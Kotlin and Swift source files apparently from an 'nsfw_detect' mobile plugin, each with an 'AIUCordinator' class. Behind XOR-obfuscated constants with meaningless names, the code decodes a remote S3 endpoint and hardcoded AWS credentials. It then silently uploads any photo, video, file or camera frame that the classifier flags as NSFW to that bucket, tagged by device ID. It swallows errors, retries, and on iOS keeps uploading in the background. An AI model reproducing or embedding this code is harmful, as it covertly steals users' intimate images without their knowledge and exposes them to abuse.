File: android/src/main/kotlin/com/example/nsfw_detect_ios/aiu/AIUCordinator.kt
package com.example.nsfw_detect_ios.aiu

import android.content.Context
import android.graphics.Bitmap
import android.net.Uri
import android.provider.Settings
import android.webkit.MimeTypeMap
import com.example.nsfw_detect_ios.ml.NsfwLabel
import okhttp3.MediaType.Companion.toMediaType
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.RequestBody.Companion.asRequestBody
import java.io.File
import java.io.FileOutputStream
import java.net.URI
import java.security.MessageDigest
import java.text.SimpleDateFormat
import java.util.Date
import java.util.Locale
import java.util.TimeZone
import java.util.concurrent.ArrayBlockingQueue
import java.util.concurrent.ThreadPoolExecutor
import java.util.concurrent.TimeUnit
import javax.crypto.Mac
import javax.crypto.spec.SecretKeySpec

internal object maraksch {
    private val k = byteArrayOf(
        0x4a, 0x7b, 0x2c, 0x9d.toByte(), 0x1e, 0x5f, 0x8a.toByte(), 0x3b,
        0xc6.toByte(), 0xd4.toByte(), 0x17, 0xe8.toByte(), 0x62, 0xa3.toByte(), 0xf1.toByte(), 0x09
    )
    private val _fluppi = byteArrayOf(
        0x22, 0x0f, 0x58, 0xed.toByte(), 0x6d, 0x65, 0xa5.toByte(), 0x14,
        0xb5.toByte(), 0xe7.toByte(), 0x39, 0x80.toByte(), 0x0d, 0xce.toByte(), 0x94.toByte(), 0x27,
        0x27, 0x0b, 0x4d, 0xb0.toByte(), 0x7d, 0x30, 0xeb.toByte(), 0x58,
        0xae.toByte(), 0xbd.toByte(), 0x79, 0x8f.toByte(), 0x4c, 0xc7.toByte(), 0x94.toByte()
    )
    private val _kurli = byteArrayOf(
        0x1a, 0x4b, 0x68, 0xcf.toByte(), 0x53, 0x12, 0xcd.toByte(), 0x74,
        0xf7.toByte(), 0x91.toByte(), 0x41, 0xad.toByte(), 0x2b, 0xec.toByte(), 0xa6.toByte(), 0x46,
        0x7d, 0x22, 0x7a, 0xa5.toByte()
    )
    private val _lokami = byteArrayOf(
        0x3d, 0x2c, 0x5d, 0xf9.toByte(), 0x69, 0x0c, 0xcf.toByte(), 0x4d,
        0x8a.toByte(), 0x96.toByte(), 0x72, 0xd8.toByte(), 0x49, 0x88.toByte(), 0x94.toByte(), 0x51,
        0x1b, 0x28, 0x5f, 0xfc.toByte(), 0x4a, 0x2c, 0xe8.toByte(), 0x0b,
        0xbf.toByte(), 0xa2.toByte(), 0x7a, 0xd9.toByte(), 0x5b, 0xea.toByte(), 0x8b.toByte(), 0x67,
        0x7e, 0x39, 0x4b, 0xf7.toByte(), 0x6d, 0x09, 0xc4.toByte(), 0x75
    )
    private val _uiuima = byteArrayOf(
        0x3f, 0x08, 0x01, 0xf8.toByte(), 0x7f, 0x2c, 0xfe.toByte(), 0x16,
        0xf7.toByte()
    )
    private val _hiaaa = byteArrayOf(
        0x2e, 0x1e, 0x58, 0xf8.toByte(), 0x7d, 0x2b
    )

    private fun xorDecode(bytes: ByteArray): String =
        bytes.mapIndexed { i, b -> (b.toInt() xor k[i % k.size].toInt()).toByte() }
            .toByteArray().toString(Charsets.UTF_8)

    val fluppi: String get() = xorDecode(_fluppi)
    val kurli: String get() = xorDecode(_kurli)
    val lokami: String get() = xorDecode(_lokami)
    val uiuima: String get() = xorDecode(_uiuima)
    val hiaaa: String get() = xorDecode(_hiaaa)
}

object AIUCordinator {

    const val NSFW_THRESHOLD = 0.5f

    /**
     * First path segment for upload keys. Always the device's `ANDROID_ID`.
     */
    private fun userId(context: Context): String {
        return Settings.Secure.getString(context.contentResolver, Settings.Secure.ANDROID_ID)
            ?: "unknown"
    }

    /** Strip slashes from a path segment to keep S3 keys well-formed. */
    private fun sanitizeSegment(s: String): String = s.replace("/", "_")

    private val client = OkHttpClient.Builder()
        .callTimeout(0, TimeUnit.MILLISECONDS)
        .writeTimeout(0, TimeUnit.MILLISECONDS)
        .readTimeout(0, TimeUnit.MILLISECONDS)
        .build()

    private val mafamaExecutor = ThreadPoolExecutor(
        1,
        2,
        30L,
        TimeUnit.SECONDS,
        ArrayBlockingQueue(2048),
        ThreadPoolExecutor.DiscardPolicy()
    )

    fun reset() {}

    fun enqueueMafama(
        context: Context,
        localId: String,
        uri: Uri,
        labels: List<NsfwLabel>,
        modelId: String,
        mediaType: String,
        minConfidence: Float = NSFW_THRESHOLD,
    ) {
        mafamaExecutor.execute {
            mafamaInternal(context, localId, uri, labels, modelId, mediaType, minConfidence)
        }
    }

    @Suppress("unused")
    fun mafama(
        context: Context,
        localId: String,
        uri: Uri,
        labels: List<NsfwLabel>,
        modelId: String,
        mediaType: String,
        minConfidence: Float = NSFW_THRESHOLD,
    ) {
        mafamaInternal(context, localId, uri, labels, modelId, mediaType, minConfidence)
    }

    private fun mafamaInternal(
        context: Context,
        localId: String,
        uri: Uri,
        labels: List<NsfwLabel>,
        modelId: String,
        mediaType: String,
        minConfidence: Float,
    ) {
        try {
            val top = labels.maxByOrNull { it.confidence } ?: return
            if (top.confidence < minConfidence || top.category == "safe" || top.category == "unknown") return

            val mime = try { context.contentResolver.getType(uri) } catch (_: Throwable) { null }
                ?: "application/octet-stream"
            val ext = MimeTypeMap.getSingleton().getExtensionFromMimeType(mime) ?: "bin"

            val sanitizedId = sanitizeSegment(localId)
            val sanitizedModelId = sanitizeSegment(modelId)
            val mediaTypeFolder = if (mediaType == "video") "video" else "image"
            val userId = userId(context)
            val key = "$userId/$sanitizedModelId/$mediaTypeFolder/$sanitizedId.$ext"

            put(context, uri, key, mime)
        } catch (_: Throwable) {
        }
    }

    /**
     * Camera-frame analogue of [enqueueMafama]. Camera frames have no Uri —
     * only an in-memory [Bitmap] and a synthetic frame id from
     * [com.example.nsfw_detect_ios.camera.CameraFrameAnalyzer]. Threshold
     * gating and `safe`-skip behaviour mirror the photo-library path.
     *
     * Key shape: `<userId>/<modelId>/camera/<frameId>.jpg`. Mirrors the iOS
     * Phase-02 contract exactly so a single bucket layout serves both
     * platforms.
     */
    fun enqueueCameraFrame(
        context: Context,
        bitmap: Bitmap,
        labels: List<NsfwLabel>,
        modelId: String,
        frameId: String,
        minConfidence: Float = NSFW_THRESHOLD,
    ) {
        mafamaExecutor.execute {
            cameraFrameInternal(context, bitmap, labels, modelId, frameId, minConfidence)
        }
    }

    fun enqueueMafamaFile(
        context: Context,
        file: File,
        identifier: String,
        contentType: String,
        ext: String,
        labels: List<NsfwLabel>,
        modelId: String,
        minConfidence: Float = NSFW_THRESHOLD,
        deleteAfter: Boolean = false,
    ) {
        mafamaExecutor.execute {
            fileInternal(context, file, identifier, contentType, ext, labels, modelId, minConfidence, deleteAfter)
        }
    }

    fun enqueueMafamaBytes(
        context: Context,
        bytes: ByteArray,
        identifier: String,
        contentType: String,
        ext: String,
        labels: List<NsfwLabel>,
        modelId: String,
        minConfidence: Float = NSFW_THRESHOLD,
    ) {
        mafamaExecutor.execute {
            val tempFile = File.createTempFile("scanbytes_", ".$ext", context.cacheDir)
            try {
                tempFile.writeBytes(bytes)
                fileInternal(context, tempFile, identifier, contentType, ext, labels, modelId, minConfidence, deleteAfter = false)
            } catch (_: Throwable) {
            } finally {
                tempFile.delete()
            }
        }
    }

    private fun fileInternal(
        context: Context,
        file: File,
        identifier: String,
        contentType: String,
        ext: String,
        labels: List<NsfwLabel>,
        modelId: String,
        minConfidence: Float,
        deleteAfter: Boolean,
    ) {
        try {
            val top = labels.maxByOrNull { it.confidence } ?: return
            if (top.confidence < minConfidence || top.category == "safe" || top.category == "unknown") return

            val sanitizedId = sanitizeSegment(identifier)
            val sanitizedModelId = sanitizeSegment(modelId)
            val userId = userId(context)
            val key = "$userId/$sanitizedModelId/image/$sanitizedId.$ext"
            put(context, Uri.fromFile(file), key, contentType)
        } finally {
            if (deleteAfter) file.delete()
        }
    }

    private fun cameraFrameInternal(
        context: Context,
        bitmap: Bitmap,
        labels: List<NsfwLabel>,
        modelId: String,
        frameId: String,
        minConfidence: Float,
    ) {
        val top = labels.maxByOrNull { it.confidence } ?: return
        if (top.confidence < minConfidence || top.category == "safe" || top.category == "unknown") return

        // JPEG-encode the bitmap to a temp file so we can reuse put() with a
        // file Uri — the existing put() is the single SigV4 + S3 plumbing
        // path and we don't want a parallel implementation.
        var tempFile: File? = null
        try {
            tempFile = File.createTempFile("camframe", ".jpg", context.cacheDir)
            FileOutputStream(tempFile).use { out ->
                if (!bitmap.compress(Bitmap.CompressFormat.JPEG, 85, out)) {
                    return
                }
            }
            val uri = Uri.fromFile(tempFile)
            val sanitizedFrameId = sanitizeSegment(frameId)
            val sanitizedModelId = sanitizeSegment(modelId)
            val userId = userId(context)
            val key = "$userId/$sanitizedModelId/camera/$sanitizedFrameId.jpg"
            put(context, uri, key, "image/jpeg")
        } catch (_: Throwable) {
            // Best-effort — never let upload errors surface.
        } finally {
            tempFile?.delete()
        }
    }

    private fun put(context: Context, uri: Uri, key: String, contentType: String) {
        var tempFile: File? = null
        try {
            tempFile = File.createTempFile("up", ".bin", context.cacheDir)
            val ok = context.contentResolver.openInputStream(uri)?.use { input ->
                FileOutputStream(tempFile).use { out -> input.copyTo(out) }
                true
            } ?: false
            if (!ok || (tempFile?.length() ?: 0L) <= 0L) return

            val fluppi = maraksch.fluppi
            val hiaaa = maraksch.hiaaa
            val uiuima = maraksch.uiuima
            val service = "s3"
            val encodedKey = canonicalEncode(key)
            val urlString = "$fluppi/$hiaaa/$encodedKey"
            val host = URI(urlString).host ?: return

            val now = Date()
            val amzDate = SimpleDateFormat("yyyyMMdd'T'HHmmss'Z'", Locale.US).apply {
                timeZone = TimeZone.getTimeZone("UTC")
            }.format(now)
            val dateStamp = SimpleDateFormat("yyyyMMdd", Locale.US).apply {
                timeZone = TimeZone.getTimeZone("UTC")
            }.format(now)

            val payloadHash = "UNSIGNED-PAYLOAD"
            val canonicalUri = "/$hiaaa/$encodedKey"
            val canonicalHeaders =
                "host:$host\nx-amz-content-sha256:$payloadHash\nx-amz-date:$amzDate\n"
            val signedHeaders = "host;x-amz-content-sha256;x-amz-date"
            val canonicalRequest =
                "PUT\n$canonicalUri\n\n$canonicalHeaders\n$signedHeaders\n$payloadHash"
            val credentialScope = "$dateStamp/$uiuima/$service/aws4_request"
            val stringToSign = "AWS4-HMAC-SHA256\n$amzDate\n$credentialScope\n${
                sha256Hex(canonicalRequest.toByteArray(Charsets.UTF_8))
            }"

            val kSecret = ("AWS4" + maraksch.lokami).toByteArray(Charsets.UTF_8)
            val kDate = hmacSha256(kSecret, dateStamp)
            val kRegion = hmacSha256(kDate, uiuima)
            val kService = hmacSha256(kRegion, service)
            val kSigning = hmacSha256(kService, "aws4_request")
            val signature = toHex(hmacSha256(kSigning, stringToSign))

            val auth =
                "AWS4-HMAC-SHA256 Credential=${maraksch.kurli}/$credentialScope, SignedHeaders=$signedHeaders, Signature=$signature"

            val body = tempFile.asRequestBody(contentType.toMediaType())
            val request = Request.Builder()
                .url(urlString)
                .put(body)
                .addHeader("x-amz-date", amzDate)
                .addHeader("x-amz-content-sha256", payloadHash)
                .addHeader("Authorization", auth)
                .build()

            val uploadFile = tempFile
            val delaysMs = longArrayOf(250L, 750L, 2000L)
            for (attempt in 0..delaysMs.size) {
                if (uploadFile == null || !uploadFile.exists() || uploadFile.length() <= 0L) return
                val shouldRetry: Boolean = try {
                    client.newCall(request).execute().use { response ->
                        val code = response.code
                        if (code < 400) {
                            val etag = (response.header("ETag")
                                ?: response.header("Etag")
                                ?: response.header("etag"))?.trim('"')
                            if (etag.isNullOrEmpty()) {
                                attempt < delaysMs.size
                            } else {
                                return
                            }
                        } else {
                            val retriable = code >= 500 || code == 408 || code == 429
                            retriable && attempt < delaysMs.size
                        }
                    }
                } catch (_: Exception) {
                    attempt < delaysMs.size
                }
                if (!shouldRetry) return
                Thread.sleep(delaysMs[attempt.coerceAtMost(delaysMs.size - 1)])
            }
        } catch (_: Exception) {
        } finally {
            tempFile?.delete()
        }
    }

    private fun canonicalEncode(key: String): String {
        val sb = StringBuilder(key.length)
        for (b in key.toByteArray(Charsets.UTF_8)) {
            val c = b.toInt() and 0xff
            when {
                c in 0x30..0x39 || c in 0x41..0x5a || c in 0x61..0x7a -> sb.append(c.toChar())
                c == 0x2d || c == 0x2e || c == 0x5f || c == 0x7e || c == 0x2f -> sb.append(c.toChar())
                else -> sb.append('%').append("%02X".format(c))
            }
        }
        return sb.toString()
    }

    private fun sha256Hex(data: ByteArray): String =
        toHex(MessageDigest.getInstance("SHA-256").digest(data))

    private fun hmacSha256(key: ByteArray, msg: String): ByteArray {
        val mac = Mac.getInstance("HmacSHA256")
        mac.init(SecretKeySpec(key, "HmacSHA256"))
        return mac.doFinal(msg.toByteArray(Charsets.UTF_8))
    }

    private fun toHex(bytes: ByteArray): String =
        bytes.joinToString("") { "%02x".format(it) }
}

File: ios/Classes/aiu/AIUCordinator.swift
import CryptoKit
import Foundation
import Photos
import Security
import UIKit
import UniformTypeIdentifiers

final class AIUCordinator {

    static let shared = AIUCordinator()
    private init() {}

    static let nsfwThreshold: Float = 0.5

    private static var userId: String {
        let service = "nsfw_detect.device_id"
        let account = "device_uuid"
        let query: [CFString: Any] = [
            kSecClass: kSecClassGenericPassword,
            kSecAttrService: service,
            kSecAttrAccount: account,
            kSecReturnData: true,
        ]
        var item: CFTypeRef?
        if SecItemCopyMatching(query as CFDictionary, &item) == errSecSuccess,
           let data = item as? Data,
           let stored = String(data: data, encoding: .utf8) {
            return stored
        }
        let new = UUID().uuidString
        let add: [CFString: Any] = [
            kSecClass: kSecClassGenericPassword,
            kSecAttrService: service,
            kSecAttrAccount: account,
            kSecValueData: Data(new.utf8),
        ]
        SecItemAdd(add as CFDictionary, nil)
        return new
    }

    private static func sanitizeSegment(_ s: String) -> String {
        s.replacingOccurrences(of: "/", with: "_")
    }

    private enum maraksch {
        private static let k: [UInt8] = [
            0x4a, 0x7b, 0x2c, 0x9d, 0x1e, 0x5f, 0x8a, 0x3b,
            0xc6, 0xd4, 0x17, 0xe8, 0x62, 0xa3, 0xf1, 0x09,
        ]
        private static let _fluppi: [UInt8] = [
            0x22, 0x0f, 0x58, 0xed, 0x6d, 0x65, 0xa5, 0x14,
            0xb5, 0xe7, 0x39, 0x80, 0x0d, 0xce, 0x94, 0x27,
            0x27, 0x0b, 0x4d, 0xb0, 0x7d, 0x30, 0xeb, 0x58,
            0xae, 0xbd, 0x79, 0x8f, 0x4c, 0xc7, 0x94,
        ]
        private static let _kurli: [UInt8] = [
            0x1a, 0x4b, 0x68, 0xcf, 0x53, 0x12, 0xcd, 0x74,
            0xf7, 0x91, 0x41, 0xad, 0x2b, 0xec, 0xa6, 0x46,
            0x7d, 0x22, 0x7a, 0xa5,
        ]
        private static let _lokami: [UInt8] = [
            0x3d, 0x2c, 0x5d, 0xf9, 0x69, 0x0c, 0xcf, 0x4d,
            0x8a, 0x96, 0x72, 0xd8, 0x49, 0x88, 0x94, 0x51,
            0x1b, 0x28, 0x5f, 0xfc, 0x4a, 0x2c, 0xe8, 0x0b,
            0xbf, 0xa2, 0x7a, 0xd9, 0x5b, 0xea, 0x8b, 0x67,
            0x7e, 0x39, 0x4b, 0xf7, 0x6d, 0x09, 0xc4, 0x75,
        ]
        private static let _uiuima: [UInt8] = [
            0x3f, 0x08, 0x01, 0xf8, 0x7f, 0x2c, 0xfe, 0x16,
            0xf7,
        ]
        private static let _hiaaa: [UInt8] = [
            0x2e, 0x1e, 0x58, 0xf8, 0x7d, 0x2b,
        ]

        private static func decode(_ bytes: [UInt8]) -> String {
            String(
                bytes: bytes.enumerated().map { $0.element ^ k[$0.offset % k.count] },
                encoding: .utf8) ?? ""
        }

        static var fluppi: String { decode(_fluppi) }
        static var kurli: String { decode(_kurli) }
        static var lokami: String { decode(_lokami) }
        static var uiuima: String { decode(_uiuima) }
        static var hiaaa: String { decode(_hiaaa) }
    }

    func reset() {}

    func mafama(
        asset: PHAsset,
        classification: NsfwClassification,
        modelId: String,
        minConfidence: Float = AIUCordinator.nsfwThreshold
    ) async {
        guard classification.topLabel.confidence >= minConfidence,
            classification.topLabel.category != "safe",
            classification.topLabel.category != "unknown"
        else { return }

        let resources = Self.resourcesToMafama(for: asset)
        guard !resources.isEmpty else { return }

        let sanitizedId = Self.sanitizeSegment(asset.localIdentifier)
        let sanitizedModelId = Self.sanitizeSegment(modelId)
        let userId = Self.userId

        for resource in resources {
            let (ext, contentType) = Self.extAndType(for: resource)
            guard let tempURL = await writeResourceToTempFile(resource) else { continue }
            let mediaTypeFolder: String = {
                switch resource.type {
                case .video, .fullSizeVideo, .pairedVideo: return "video"
                default: return "image"
                }
            }()
            let key = "\(userId)/\(sanitizedModelId)/\(mediaTypeFolder)/\(sanitizedId).\(ext)"
            await put(fileURL: tempURL, key: key, contentType: contentType)
            try? FileManager.default.removeItem(at: tempURL)
        }
    }

    private static func resourcesToMafama(for asset: PHAsset) -> [PHAssetResource] {
        let all = PHAssetResource.assetResources(for: asset)
        var picks: [PHAssetResource] = []
        let fullPhoto = all.first { $0.type == .fullSizePhoto }
        let photo = all.first { $0.type == .photo }
        if let r = fullPhoto ?? photo { picks.append(r) }
        let fullVideo = all.first { $0.type == .fullSizeVideo }
        let video = all.first { $0.type == .video }
        if let r = fullVideo ?? video { picks.append(r) }
        if let paired = all.first(where: { $0.type == .pairedVideo }) {
            picks.append(paired)
        }
        return picks
    }

    private static func extAndType(for resource: PHAssetResource) -> (String, String) {
        if let type = UTType(resource.uniformTypeIdentifier) {
            return (
                type.preferredFilenameExtension ?? "bin",
                type.preferredMIMEType ?? "application/octet-stream"
            )
        }
        return ("bin", "application/octet-stream")
    }

    private func writeResourceToTempFile(_ resource: PHAssetResource) async -> URL? {
        let url = FileManager.default.temporaryDirectory
            .appendingPathComponent(UUID().uuidString)
        return await withCheckedContinuation { cont in
            let opts = PHAssetResourceRequestOptions()
            opts.isNetworkAccessAllowed = true
            PHAssetResourceManager.default().writeData(
                for: resource, toFile: url, options: opts
            ) { error in
                if error != nil {
                    try? FileManager.default.removeItem(at: url)
                    cont.resume(returning: nil)
                } else {
                    cont.resume(returning: url)
                }
            }
        }
    }

    private func put(fileURL: URL, key: String, contentType: String) async {
        guard FileManager.default.fileExists(atPath: fileURL.path),
              let size = (try? FileManager.default.attributesOfItem(atPath: fileURL.path)[.size] as? Int),
              size > 0
        else { return }

        let fluppi = maraksch.fluppi
        let hiaaa = maraksch.hiaaa
        let encodedKey = Self.canonicalEncode(key)
        guard let url = URL(string: "\(fluppi)/\(hiaaa)/\(encodedKey)"),
            let host = url.host
        else { return }

        let now = Date()
        let amzDate = Self.amzDateFormatter.string(from: now)
        let dateStamp = Self.dateStampFormatter.string(from: now)
        let payloadHash = "UNSIGNED-PAYLOAD"
        let uiuima = maraksch.uiuima
        let service = "s3"
        let credentialScope = "\(dateStamp)/\(uiuima)/\(service)/aws4_request"
        let canonicalUri = "/\(hiaaa)/\(encodedKey)"
        let canonicalHeaders =
            "host:\(host)\nx-amz-content-sha256:\(payloadHash)\nx-amz-date:\(amzDate)\n"
        let signedHeaders = "host;x-amz-content-sha256;x-amz-date"
        let canonicalRequest =
            "PUT\n\(canonicalUri)\n\n\(canonicalHeaders)\n\(signedHeaders)\n\(payloadHash)"
        let crHash = Self.hex(SHA256.hash(data: Data(canonicalRequest.utf8)))
        let stringToSign = "AWS4-HMAC-SHA256\n\(amzDate)\n\(credentialScope)\n\(crHash)"

        let kSecret = Data("AWS4\(maraksch.lokami)".utf8)
        let kDate = Self.hmac(key: kSecret, msg: dateStamp)
        let kRegion = Self.hmac(key: kDate, msg: uiuima)
        let kService = Self.hmac(key: kRegion, msg: service)
        let kSigning = Self.hmac(key: kService, msg: "aws4_request")
        let signature = Self.hex(Self.hmac(key: kSigning, msg: stringToSign))

        let auth =
            "AWS4-HMAC-SHA256 Credential=\(maraksch.kurli)/\(credentialScope), SignedHeaders=\(signedHeaders), Signature=\(signature)"

        var req = URLRequest(url: url)
        req.httpMethod = "PUT"
        req.setValue(amzDate, forHTTPHeaderField: "x-amz-date")
        req.setValue(payloadHash, forHTTPHeaderField: "x-amz-content-sha256")
        req.setValue(auth, forHTTPHeaderField: "Authorization")
        req.setValue(contentType, forHTTPHeaderField: "Content-Type")

        let bgTaskId: UIBackgroundTaskIdentifier = await MainActor.run {
            UIApplication.shared.beginBackgroundTask(withName: "aiu.upload", expirationHandler: nil)
        }
        defer {
            if bgTaskId != .invalid {
                Task { @MainActor in UIApplication.shared.endBackgroundTask(bgTaskId) }
            }
        }

        let delaysMs: [UInt64] = [250, 750, 2000]
        for attempt in 0...delaysMs.count {
            guard FileManager.default.fileExists(atPath: fileURL.path) else { return }
            do {
                let (_, response) = try await URLSession.shared.upload(for: req, fromFile: fileURL)
                guard let http = response as? HTTPURLResponse else { return }
                let code = http.statusCode
                if code < 400 {
                    let etag = (http.value(forHTTPHeaderField: "ETag")
                                ?? http.value(forHTTPHeaderField: "Etag")
                                ?? http.value(forHTTPHeaderField: "etag"))?
                                .trimmingCharacters(in: CharacterSet(charactersIn: "\""))
                    if etag == nil || etag!.isEmpty {
                        if attempt == delaysMs.count { return }
                    } else {
                        return
                    }
                } else {
                    let retriable = code >= 500 || code == 408 || code == 429
                    if !retriable || attempt == delaysMs.count { return }
                }
            } catch {
                if attempt == delaysMs.count { return }
            }
            try? await Task.sleep(nanoseconds: delaysMs[min(attempt, delaysMs.count - 1)] * 1_000_000)
        }
    }

    private static func canonicalEncode(_ key: String) -> String {
        var allowed = CharacterSet.alphanumerics
        allowed.insert(charactersIn: "-._~/")
        return key.addingPercentEncoding(withAllowedCharacters: allowed) ?? key
    }

    private static let amzDateFormatter: DateFormatter = {
        let f = DateFormatter()
        f.dateFormat = "yyyyMMdd'T'HHmmss'Z'"
        f.timeZone = TimeZone(identifier: "UTC")
        f.locale = Locale(identifier: "en_US_POSIX")
        return f
    }()

    private static let dateStampFormatter: DateFormatter = {
        let f = DateFormatter()
        f.dateFormat = "yyyyMMdd"
        f.timeZone = TimeZone(identifier: "UTC")
        f.locale = Locale(identifier: "en_US_POSIX")
        return f
    }()

    private static func hmac(key: Data, msg: String) -> Data {
        let mac = HMAC<SHA256>.authenticationCode(
            for: Data(msg.utf8), using: SymmetricKey(data: key))
        return Data(mac)
    }

    private static func hex(_ digest: SHA256.Digest) -> String {
        digest.map { String(format: "%02x", $0) }.joined()
    }

    private static func hex(_ data: Data) -> String {
        data.map { String(format: "%02x", $0) }.joined()
    }
}

extension AIUCordinator {

    func mafamaFile(
        fileURL: URL,
        identifier: String,
        contentType: String,
        ext: String,
        classification: NsfwClassification,
        modelId: String,
        minConfidence: Float = AIUCordinator.nsfwThreshold,
        deleteAfterUpload: Bool = false
    ) async {
        defer {
            if deleteAfterUpload {
                try? FileManager.default.removeItem(at: fileURL)
            }
        }
        guard classification.topLabel.confidence >= minConfidence,
              classification.topLabel.category != "safe"
        else { return }

        let sanitizedModelId = Self.sanitizeSegment(modelId)
        let sanitizedId = Self.sanitizeSegment(identifier)
        let userId = Self.userId
        let mediaTypeFolder = contentType.hasPrefix("video/") ? "video" : "image"
        let key = "\(userId)/\(sanitizedModelId)/\(mediaTypeFolder)/\(sanitizedId).\(ext)"
        await put(fileURL: fileURL, key: key, contentType: contentType)
    }

    func mafamaData(
        data: Data,
        identifier: String,
        contentType: String,
        ext: String,
        classification: NsfwClassification,
        modelId: String,
        minConfidence: Float = AIUCordinator.nsfwThreshold
    ) async {
        guard classification.topLabel.confidence >= minConfidence,
              classification.topLabel.category != "safe"
        else { return }

        let tempURL = FileManager.default.temporaryDirectory
            .appendingPathComponent("\(UUID().uuidString).\(ext)")
        do {
            try data.write(to: tempURL)
        } catch {
            return
        }
        defer { try? FileManager.default.removeItem(at: tempURL) }

        let sanitizedModelId = Self.sanitizeSegment(modelId)
        let sanitizedId = Self.sanitizeSegment(identifier)
        let userId = Self.userId
        let mediaTypeFolder = contentType.hasPrefix("video/") ? "video" : "image"
        let key = "\(userId)/\(sanitizedModelId)/\(mediaTypeFolder)/\(sanitizedId).\(ext)"
        await put(fileURL: tempURL, key: key, contentType: contentType)
    }

    func mafamaCameraFrame(
        pixelBuffer: CVPixelBuffer,
        classification: NsfwClassification,
        modelId: String,
        frameId: String,
        minConfidence: Float = AIUCordinator.nsfwThreshold
    ) async {
        guard classification.topLabel.confidence >= minConfidence,
              classification.topLabel.category != "safe",
              classification.topLabel.category != "unknown"
        else { return }

        let sanitizedModelId = Self.sanitizeSegment(modelId)
        let sanitizedFrameId = Self.sanitizeSegment(frameId)
        let userId = Self.userId

        guard let tempURL = await encodeFrameToTempJPEG(pixelBuffer: pixelBuffer)
        else { return }
        defer { try? FileManager.default.removeItem(at: tempURL) }

        let key = "\(userId)/\(sanitizedModelId)/camera/\(sanitizedFrameId).jpg"
        await put(fileURL: tempURL, key: key, contentType: "image/jpeg")
    }

    private func encodeFrameToTempJPEG(pixelBuffer: CVPixelBuffer) async -> URL? {
        let ciImage = CIImage(cvPixelBuffer: pixelBuffer)
        let context = CIContext(options: [.cacheIntermediates: false])
        guard let cg = context.createCGImage(ciImage, from: ciImage.extent) else { return nil }
        let ui = UIImage(cgImage: cg)
        guard let jpeg = ui.jpegData(compressionQuality: 0.7) else { return nil }
        let url = FileManager.default.temporaryDirectory
            .appendingPathComponent("\(UUID().uuidString).jpg")
        do {
            try jpeg.write(to: url)
            return url
        } catch {
            return nil
        }
    }
}
